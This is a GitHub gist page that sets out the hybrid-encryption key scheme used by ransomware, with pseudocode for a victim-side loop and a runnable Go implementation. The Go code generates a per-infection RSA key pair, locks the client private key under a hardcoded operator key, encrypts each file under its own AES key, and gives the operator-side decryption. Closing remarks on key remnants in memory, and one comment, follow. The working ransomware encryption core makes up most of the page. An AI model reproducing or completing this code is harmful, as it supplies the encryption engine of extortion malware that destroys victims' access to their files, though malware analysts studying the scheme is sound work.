@tarcisio-marinho
Created August 30, 2018 17:14
# Key hierarchy of the scheme (pseudocode; the helper functions stand for
# abstract operations, not a particular library):
#   Spriv      - server (operator) private key, never present on the victim
#   Spub       - server public key, hardcoded in the binary
#   Cpriv/Cpub - client key pair, generated fresh for each infection
#   AES key    - one random key per file, encrypted with Cpub

# Client public and private key go here / a new key pair is generated for each infection
client_public_key = ""
client_private_key = ""

# Hardcoded Spub.key
server_public_key = ""

# Encrypt Cpriv.key with Spub.key, so only the holder of Spriv can recover it
encrypted_client_private_key = encrypt_client_private_key(client_private_key, server_public_key)
write_to_disk(encrypted_client_private_key)

# Wipe the plaintext client private key; from here on only Cpub is usable on this machine
delete_client_private_key(client_private_key)

# Files found on the infected machine
found_files = []

# Encrypted AES keys are stored here, each paired with the file it belongs to
encrypted_aes_keys = []

# For each file
for file in found_files:
    # Generate a random AES key for this file
    aes_key = generate_aes_key()
    # Encrypt the file with that key
    encrypt_file(file, aes_key)
    # Encrypt the AES key with Cpub.key (unwrapping it needs Cpriv, which is locked under Spub)
    encrypted_aes_key = encrypt_aes_key(aes_key, client_public_key)
    encrypted_aes_keys.append((file, encrypted_aes_key))
    # Wipe the plaintext AES key
    delete_aes_key(aes_key)

# Save the encrypted AES keys to disk
write_to_disk(encrypted_aes_keys)
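The key hierarchy above, as an added example that is not part of the gist: a working Go version (Go's standard library has RSA-OAEP and AES-GCM, so it runs with no dependencies) over constructed in-memory byte strings; nothing is written to disk and no real files are touched. Two details the pseudocode glosses over are made explicit: RSA-OAEP cannot encrypt a message as long as an RSA private key (190 bytes is the limit with RSA-2048 and SHA-256), so Cpriv is wrapped through the same AES-then-RSA envelope as the files; and each file's wrapped key is stored next to its ciphertext instead of in a separate list. The names envelope, seal, unseal, infect and decryptAll are this example's own, not the gist's.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"fmt"
)

// envelope is one hybrid-encrypted record: data under a fresh AES-256-GCM key,
// that key under RSA-OAEP to a public key. The gist uses this shape at both
// levels (Cpriv under Spub, each file's key under Cpub), so one type serves both.
type envelope struct {
	wrappedKey, nonce, ciphertext []byte
}

// seal encrypts plaintext under a random AES key and wraps that key to pub.
func seal(pub *rsa.PublicKey, plaintext []byte) (envelope, error) {
	buf := make([]byte, 32+12) // AES-256 key followed by a 96-bit GCM nonce
	if _, err := rand.Read(buf); err != nil {
		return envelope{}, err
	}
	key, nonce := buf[:32], buf[32:]
	block, _ := aes.NewCipher(key) // cannot fail for a 32-byte key
	gcm, _ := cipher.NewGCM(block)
	ct := gcm.Seal(nil, nonce, plaintext, nil)
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	copy(key, make([]byte, len(key))) // delete_aes_key: the plaintext key does not outlive this call
	return envelope{wrapped, nonce, ct}, err
}

// unseal reverses seal; it needs the private half of the wrapping key pair.
func unseal(priv *rsa.PrivateKey, e envelope) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, e.wrappedKey, nil)
	if err != nil || len(key) != 32 {
		return nil, fmt.Errorf("unwrap AES key (%d bytes): %v", len(key), err)
	}
	block, _ := aes.NewCipher(key)
	gcm, _ := cipher.NewGCM(block)
	return gcm.Open(nil, e.nonce, e.ciphertext, nil) // the GCM tag rejects any tampering
}

// infection is what stays on the victim: Cpriv only in Spub-wrapped form, each file under its own Cpub-wrapped key.
type infection struct {
	clientPriv envelope
	files      map[string]envelope
}

// infect is the gist's victim-side loop over in-memory data; only Spub is needed here. RSA-OAEP cannot
// encrypt a whole RSA private key (190 bytes max for RSA-2048/SHA-256), so Cpriv gets the same envelope as the files.
func infect(serverPub *rsa.PublicKey, files map[string][]byte) (*infection, error) {
	clientPriv, err := rsa.GenerateKey(rand.Reader, 2048) // new pair per infection
	if err != nil {
		return nil, err
	}
	wrappedPriv, err := seal(serverPub, x509.MarshalPKCS1PrivateKey(clientPriv))
	if err != nil {
		return nil, err
	}
	clientPub := &rsa.PublicKey{N: clientPriv.N, E: clientPriv.E}
	clientPriv = nil // delete_client_private_key: drop the only reference (Go cannot promise a memory wipe)
	inf := &infection{clientPriv: wrappedPriv, files: map[string]envelope{}}
	for name, data := range files {
		if inf.files[name], err = seal(clientPub, data); err != nil { // one random AES key per file
			return nil, err
		}
	}
	return inf, nil
}

// decryptAll is the operator side: Spriv unwraps Cpriv, Cpriv unwraps every file
// key. With any other RSA key the first OAEP step fails and nothing is reachable.
func decryptAll(serverPriv *rsa.PrivateKey, inf *infection) (map[string][]byte, error) {
	der, err := unseal(serverPriv, inf.clientPriv)
	if err != nil {
		return nil, fmt.Errorf("client private key: %w", err)
	}
	clientPriv, err := x509.ParsePKCS1PrivateKey(der)
	if err != nil {
		return nil, err
	}
	out := map[string][]byte{}
	for name, e := range inf.files {
		if out[name], err = unseal(clientPriv, e); err != nil {
			return nil, fmt.Errorf("%s: %w", name, err)
		}
	}
	return out, nil
}

func main() {
	serverPriv, _ := rsa.GenerateKey(rand.Reader, 2048) // Spriv stays with the operator
	inf, _ := infect(&serverPriv.PublicKey, map[string][]byte{"notes.txt": []byte("constructed sample")})
	got, err := decryptAll(serverPriv, inf)
	fmt.Printf("with Spriv: %q err=%v\n", got["notes.txt"], err)
}
```

What to look at when running it: decryptAll succeeds only with the RSA private key matching the hardcoded Spub; with any other key the OAEP unwrap of Cpriv fails, so none of the per-file keys can be reached, and a flipped bit in any ciphertext is rejected by the GCM tag rather than decrypted to garbage. The one place the Go version cannot honour the gist is "deallocate the key": dropping the last reference to an rsa.PrivateKey leaves the big.Int material for the garbage collector, which does not zero it, so a memory image taken soon after infection may still contain Cpriv. That gap is the same one the gist's delete_client_private_key step has in any managed runtime, and it is the first thing to check in a memory capture of a sample built this way.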
Ox41 commented Nov 11, 2022

Are ransomware authors still using this technique?
